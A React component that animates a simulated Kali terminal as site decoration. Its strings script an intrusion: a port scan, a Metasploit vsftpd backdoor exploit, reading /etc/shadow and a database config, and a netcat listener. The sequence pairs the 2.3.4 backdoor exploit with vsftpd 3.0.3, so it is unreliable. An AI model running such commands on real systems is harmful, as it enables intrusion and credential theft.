import { useState, useEffect } from 'react';
import { Terminal } from 'lucide-react';

const KaliTerminal = () => {
  const [currentLine, setCurrentLine] = useState(0);
  const [displayedText, setDisplayedText] = useState([]);

  const terminalCommands = [
    { cmd: 'root@kali:~#', text: 'nmap -sS -sV -O 10.10.14.0/24', delay: 100 },
    { cmd: '', text: 'Starting Nmap 7.94 ( https://nmap.org )', delay: 50 },
    { cmd: '', text: 'Nmap scan report for [REDACTED]', delay: 50 },
    { cmd: '', text: 'Host is up (0.0012s latency).', delay: 50 },
    { cmd: '', text: 'PORT     STATE SERVICE    VERSION', delay: 50 },
    { cmd: '', text: '21/tcp   open  ftp        vsftpd 3.0.3', delay: 50 },
    { cmd: '', text: '22/tcp   open  ssh        OpenSSH 8.9', delay: 50 },
    { cmd: '', text: '80/tcp   open  http       Apache httpd 2.4.52', delay: 50 },
    { cmd: '', text: '443/tcp  open  ssl/https  Apache httpd 2.4.52', delay: 50 },
    { cmd: '', text: '3306/tcp open  mysql      MySQL 8.0.31', delay: 50 },
    { cmd: 'root@kali:~#', text: 'searchsploit vsftpd 3.0.3', delay: 100 },
    { cmd: '', text: 'Exploit Title                                  Path', delay: 50 },
    { cmd: '', text: 'vsftpd 3.0.3 - Remote Denial of Service       /linux/remote/49719.py', delay: 50 },
    { cmd: '', text: 'vsftpd 3.0.3 - Backdoor Command Execution     /unix/remote/17491.rb', delay: 50 },
    { cmd: 'root@kali:~#', text: 'msfconsole -q', delay: 100 },
    { cmd: 'msf6 >', text: 'use exploit/unix/ftp/vsftpd_234_backdoor', delay: 80 },
    { cmd: 'msf6 exploit(unix/ftp/vsftpd_234_backdoor) >', text: 'set RHOSTS 10.10.14.23', delay: 80 },
    { cmd: '', text: 'RHOSTS => 10.10.14.23', delay: 50 },
    { cmd: 'msf6 exploit(unix/ftp/vsftpd_234_backdoor) >', text: 'set LHOST 10.10.14.5', delay: 80 },
    { cmd: '', text: 'LHOST => 10.10.14.5', delay: 50 },
    { cmd: 'msf6 exploit(unix/ftp/vsftpd_234_backdoor) >', text: 'exploit', delay: 80 },
    { cmd: '', text: '[*] 10.10.14.23:21 - Banner: 220 (vsFTPd 3.0.3)', delay: 50 },
    { cmd: '', text: '[*] 10.10.14.23:21 - USER: 331 Please specify the password.', delay: 50 },
    { cmd: '', text: '[+] 10.10.14.23:21 - Backdoor service has been spawned, handling...', delay: 50 },
    { cmd: '', text: '[+] 10.10.14.23:21 - UID: uid=0(root) gid=0(root) groups=0(root)', delay: 50 },
    { cmd: '', text: '[*] Found shell.', delay: 50 },
    { cmd: '', text: '[*] Command shell session 1 opened', delay: 50 },
    { cmd: 'root@kali:~#', text: 'python3 -c \'import pty;pty.spawn("/bin/bash")\'', delay: 100 },
    { cmd: 'root@[REDACTED]:~#', text: 'whoami', delay: 80 },
    { cmd: '', text: 'root', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'cat /etc/shadow | head -n 3', delay: 80 },
    { cmd: '', text: 'root:$6$xyz...[REDACTED]...abc:18950:0:99999:7:::', delay: 50 },
    { cmd: '', text: 'admin:$6$def...[REDACTED]...ghi:18950:0:99999:7:::', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'find / -name "*.conf" -type f 2>/dev/null | grep -i database', delay: 100 },
    { cmd: '', text: '/var/www/html/config/database.conf', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'cat /var/www/html/config/database.conf', delay: 80 },
    { cmd: '', text: 'DB_HOST=localhost', delay: 50 },
    { cmd: '', text: 'DB_USER=webapp_admin', delay: 50 },
    { cmd: '', text: 'DB_PASS=[REDACTED]', delay: 50 },
    { cmd: '', text: 'DB_NAME=production_db', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'mysql -u webapp_admin -p[REDACTED] -e "show databases;"', delay: 100 },
    { cmd: '', text: '+--------------------+', delay: 50 },
    { cmd: '', text: '| Database           |', delay: 50 },
    { cmd: '', text: '+--------------------+', delay: 50 },
    { cmd: '', text: '| information_schema |', delay: 50 },
    { cmd: '', text: '| production_db      |', delay: 50 },
    { cmd: '', text: '| user_credentials   |', delay: 50 },
    { cmd: '', text: '+--------------------+', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'nc -lvnp 4444 &', delay: 100 },
    { cmd: '', text: 'Listening on 0.0.0.0 4444', delay: 50 },
    { cmd: 'root@[REDACTED]:~#', text: 'echo "Persistence established. Exfiltration complete."', delay: 100 },
    { cmd: '', text: 'Persistence established. Exfiltration complete.', delay: 50 },
    { cmd: 'root@kali:~#', text: '_', delay: 100 }
  ];

  useEffect(() => {
    if (currentLine < terminalCommands.length) {
      const timer = setTimeout(() => {
        setDisplayedText(prev => [...prev, terminalCommands[currentLine]]);
        setCurrentLine(currentLine + 1);
      }, terminalCommands[currentLine].delay);

      return () => clearTimeout(timer);
    }
  }, [currentLine]);

  return (
    <div className="bg-[hsl(var(--cyber-darker))] border border-[hsl(var(--neon-green))] p-4 font-mono text-sm overflow-hidden" data-testid="kali-terminal">
      <div className="flex items-center gap-2 mb-3 pb-2 border-b border-[hsl(var(--border))]">
        <Terminal className="w-4 h-4 text-[hsl(var(--neon-green))]" />
        <span className="text-[hsl(var(--neon-green))] font-bold">root@kali-linux:~</span>
        <div className="flex gap-1 ml-auto">
          <div className="w-3 h-3 rounded-full bg-[hsl(var(--neon-red))]"></div>
          <div className="w-3 h-3 rounded-full bg-[hsl(var(--neon-cyan))]"></div>
          <div className="w-3 h-3 rounded-full bg-[hsl(var(--neon-green))]"></div>
        </div>
      </div>
      <div className="h-[400px] overflow-y-auto terminal-scroll">
        {displayedText.map((line, index) => (
          <div key={index} className="mb-1">
            {line.cmd && (
              <span className="text-[hsl(var(--neon-green))]">{line.cmd} </span>
            )}
            <span className={line.cmd ? "text-[hsl(var(--terminal-green))]" : "text-[hsl(var(--muted-foreground))]"}>
              {line.text}
            </span>
          </div>
        ))}
      </div>
    </div>
  );
};

export default KaliTerminal;
